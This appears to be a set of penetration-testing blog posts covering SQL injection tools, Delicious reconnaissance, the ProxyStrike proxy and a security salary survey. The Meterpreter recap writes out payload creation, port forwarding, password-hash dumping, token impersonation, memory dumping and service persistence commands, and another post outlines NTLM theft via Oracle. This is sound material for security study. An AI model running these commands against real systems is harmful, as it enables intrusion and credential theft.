Pangolin and your data

This will be a brief entry about a dubious behavior of Pangolin (SQL Injection Tool). Today we were checking some of the features of Pangolin, and i had special interest on the ORACLE UTL_HTPP injection, i checked the options and there wasn't a configuration for the local HTTP server, so i was wondering how the hell they got the results back.

So i started Pangolin against a test server, and there wasn't any open port in my machine, next step my coworker Javi, launched the attack and sniffed the traffic, all the injection was urlencoded+Oracle (char) encoding, after decoding we found that the results of the injection is sent to a nosec.org web server, and then Pangolin perform a GET to retrieve the data. WTH?

At least let the user know what are you doing with the data, i don't think this will make penetration testers happy, knowing that they customers data is traveling via a third party server.

Be careful where you send your data ;)

-CMM

Information Gathering: Delicious

Here is a new source that could help you during a Penetration Test, it's not a source that will give you results most of the times, but hey! maybe you are lucky.

Delicious is a service for keeping your bookmarks in one place (online), it's social bookmarking.

So let's go with an example; if you have some nicknames from your target, you can search directly on their Delicious profile, all their public links, for example my profile:

http://delicious.com/laramies

Remember that users can mark a link as private, but here is where we can be lucky if they forget to save it as private.

Another way of searching in Delicious, is using target company URL's or IP's, in this example i will use just a standard internal ip:

192.168.1.1

And look the second result:



The root password in the url :)

In particular cases you can obtain interesting results

-CMM

ProxyStrike Plugins update

Well this is a short post, just to let you know that the plugins framework of ProxyStrike is updated, making easier to develop your own plugins. Here is a diagram of the internal structure:


Now each plugin is a file, and here is an example of a plugin for gathering all the email addresses:

class email_detect(AttackPlugin):
       def __init__(self):
               AttackPlugin.__init__(self,name="email detect",variableSet=False,iface=True,type="tree",fields=["Url","Email"])

               self.emailre=re.compile("[a-z0-9_.-]+@[a-z0-9_.-]+",re.I)

       def process(self,req):
               html=req.response.getContent()
               a=self.emailre.findall(html)
               results=[]
               for i in a:
                       results.append([i])
               if a: 
                       self.putRESULTS([req.completeUrl,results])

You can find more examples inside the plugin folder, just get your copy via subversion:

svn checkout http://proxystrike.googlecode.com/svn/trunk/ proxystrike-read-only

More information in the wiki, and you can follow updates by deepbit in his new blog

Enjoy

-CMM

Meterpreter Post exploitation - Recap

I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first Meterpreter paper:

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) files that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.

First of all, i would like to remark that i use Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:

./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe

Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:

./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Or inside the metasploit console:

msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp

msf exploit(handler)> set LPORT 443

msf exploit(handler)> exploit

Well once we have a working connection, these are some things that you can do:

-Port forwarding: You can make port redirections,

meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389

-L = ip that will hold the listening port

-l = the listening port

-h = the target host

-p = the target port

Now you should connect to the exploited machine on port 444

More on forwarding and routing here

-HashDumps:

You can get the hashes of the user accounts, like the pwdump utility, for later cracking.

meterpreter> use privs (we load the privileges module)

meterpreter> hashdump

You need Admin/System privileges to work.

-User impersonation, using the token passing technique:

You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by Luke Jennings:

meterpreter> use incognito (we load the incognito module)

meterpreter> list_tokens (we list all available sessions)

meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)

You need Admin/System privileges to work.

If you want to revert the situation an obtain your original session, you can execute:

meterpreter> rev2self

More on working with Incognito and Meterpreter at Carnal0wnage

Dumping memory to extract hashes (using mdd.exe):

Here we first need to upload mdd.exe (Mantech)

meterpreter> upload mdd.exe .

meterpreter> execute -f mdd.exe -a "-o mydump.dd"

meterpreter> download mydump.dd .

Now we need can use volatility to:

• cachedump Dump (decrypted) domain hashes from the registry
• hashdump Dump (decrypted) LM and NT hashes from the registry
• hivelist Print list of registry hives
• hivescan Scan for _CMHIVE objects (registry hives)
• lsadump Dump (decrypted) LSA secrets from the registry

More information on using meterpreter + mdd + volatility on Attack Research blog

Another resource for Meterpreter plugins is the DarkOperator website, where we can find some modules like:

• Disable_Audit: Disable auditing, by changing the local security policy

• GetGui: Script for enabling RDP service on target host.

• GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.

• Memdump: Automation for mdd

• WinEnum: Script that will gather a big amount of information about the host

• Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.

• NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.

• Soundrecorder: Allows you to record sound on the target machine :)

• GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.

You can find examples of these modules and the source code in the the Darkoperator website under the meterpreter zone, many of them are included in the Metasploit project.

Meterpreter service wrapper:

You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from Phreedom.org (Alexander Sotirov)

c:> metsvc.exe install-service (it will launch on port 31337)

Well that's all for now, i will like to thanks Chris Gates and Carlos Perez (DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.

Also a big thanks for all the Metasploit team, for their great work.

Enjoy your post exploitation ...

-CMM

From Oracle to the OS with Metasploit

I'm back from my vacations, and it's time write some new posts

I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from www.dsecrg.com, they have more interesting things about Oracle penetration testing on their website.

The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.

The author explains the creation of a Metasploit plugin (ora_ntlm_stealer) to automate the process, so you can get it by updating your svn copy.

Here is the paper with the complete information

Enjoy

-CMM

ProxyStrike v2.0 released!

I'm pleased to announce a new version of ProxyStrike, an active Web Application Proxy, a tool designed to find vulnerabilities while browsing an application. It was created because the problems we faced in the pentests of web applications that heavily depends on Javascript, not many web scanners did it good at this stage, so we came with this proxy.

Right now it has available Sql injection, XSS and Server side includes.

Highlights from this release:

• Plugin engine (Create your own plugins!)

• Automatic crawl process

• Request interceptor

• Request diffing

• Request repeater

• Save/restore session

• Http request/response history

• Request parameter stats

• Request parameter values stats

• Request url parameter signing and header field signing

• Use of an alternate proxy (tor for example ;D )

• Attack logs

• Export results to HTML or XML

* Sql attacks (plugin)

• Server Side Includes (plugin)

• Xss attacks (plugin)

Check it at: http://www.edge-security.com/proxystrike.php

Here is a video of the tool:

Great Job from Carlos del Ojo (deepbit) for this new release

-CMM

Security Industry Salary and Certification Survey 2008

Sans Institute released an excellent study about the salaries in the Security industry and relations with certifications. This is a great study for the professionals to know where they are in relation with they career. I would like to see one of these studies for Europe, this one particularly covers USA.

The survey shows that the Security industry is one of less affected by the crisis, and where the companies plan to invest in this year.

If someone need help for a European version, let me know.

Download here

Here you have some interesting bits:

• Salaries for information security professionals are high. Over 38% of respondents earn US $100,000 or more per year.

• 41% of the respondents said their organizations use certifications as a factor when determining salary increases.

• The overall mean funding for training was US $2,854 per year with a median of US $2,000 per year.

• Digital forensics, intrusion detection, and penetration testing are the technical topics respondents are most interested in learning in 2009.

• As of late November 2008, just over 79% of respondents forecast no information security personnel reductions in the next 12 months.

• Over 25% of respondents plan to deploy the following technologies in 2009:

  • Configuration Management
  • SIEM (Security Information and Event Management)
  • Storage Security
  • Wireless Security Solutions

• The best places to find an information security position are in the metro areas of Las Vegas, Nevada; Dallas, Texas; and Washington, DC.

-CMM